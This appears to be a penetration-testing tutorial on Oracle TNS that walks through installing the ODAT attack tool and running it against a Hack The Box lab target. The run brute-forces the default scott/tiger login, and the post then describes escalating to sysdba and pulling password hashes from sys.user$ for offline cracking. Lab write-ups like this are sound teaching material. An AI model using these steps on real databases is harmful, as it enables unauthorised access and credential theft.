Oracle TNS Penetration Test Using ODAT
What is Oracle TNS?
The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. Initially introduced as part of the Oracle Net Services software suite, TNS supports various networking protocols between Oracle databases and client applications, such as IPX/SPX and TCP/IP protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries. In addition, its built-in encryption mechanism ensures the security of data transmitted, making it an ideal solution for enterprise environments where data security is paramount.
Over time, TNS has been updated to support newer technologies, including IPv6 and SSL/TLS encryption which makes it more suitable for the following purposes:
Furthermore, it enables encryption between client and server communication through an additional layer of security over the TCP/IP protocol layer. This feature helps secure the database architecture from unauthorized access or attacks that attempt to compromise the data on the network traffic. Besides, it provides advanced tools and capabilities for database administrators and developers since it offers comprehensive performance monitoring and analysis tools, error reporting and logging capabilities, workload management, and fault tolerance through database services.
Oracle Database Attacking Tool
Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.
Here’s how to set it up:
#!/bin/bash
sudo apt-get install libaio1 python3-dev alien python3-pip -y
git clone <https://github.com/quentinhardy/odat.git>
cd odat/
git submodule init
git submodule update
sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycryptodome passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcompleteAfter that, we can try to determine if the installation was successful by running the following command:
oqyu@htb[/htb]$ ./odat.py -h
usage: odat.py [-h] [--version]
{all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
...
_ __ _ ___
/ \\| \\ / \\|_ _|
( o ) o ) o || |
\\_/|__/|_n_||_|
-------------------------------------------
_ __ _ ___
/ \\ | \\ / \\ |_ _|
( o ) o ) o | | |
\\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
...SNIP...Example of ODAT Implementation
ODAT boasts numerous modules for various functionalities. For instance, using the ‘all’ command allows users to run all modules, providing a comprehensive understanding of the toolkit’s capabilities.
For this example, we’ll be using a lab from Hack The Box to demonstrate.
oqyu@htb[/htb]$ ./odat.py all -s 10.129.24.217
[+] Checking if target 10.129.24.217:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.24.217:1521 is well configured. Continue...
...SNIP...
[!] Notice: 'outln' account is locked, so skipping this username for password################ | ETA: 00:09:00
[+] Valid credentials found: scott/tiger. Continue... ##################################### | ETA: 00:05:01
[!] Notice: 'xdb' account is locked, so skipping this username for password############################################################## | ETA: 00:00:59
100% |#########################################################################################################################################| Time: 00:24:40
[+] Accounts found on 10.129.24.217:1521/sid:XE:
scott/tiger
...SNIP...After a certain amount of time, we’ll find a credential that we can use “scoott/tiger”. From here, we’ll be using SQLplus to interact with the Oracle Database.
If you come across the following error
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, please execute the command below, taken from here.
oqyu@htb[/htb]$ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
Here, the user scott has no administrative privileges. However, we can try using this account to log in as the System Database Admin (sysdba), giving us higher privileges. This is possible when the user scott has the appropriate privileges typically granted by the database administrator or used by the administrator him/herself.
From this point, we could retrieve the password hashes from the sys.user$ and try to crack them offline. The query for this would look like the following:
References:
https://wirexsystems.com/resource/protocols/tns
https://github.com/quentinhardy/odat
https://www.whiteoaksecurity.com/blog/exploiting-oracle-databases-with-odat/
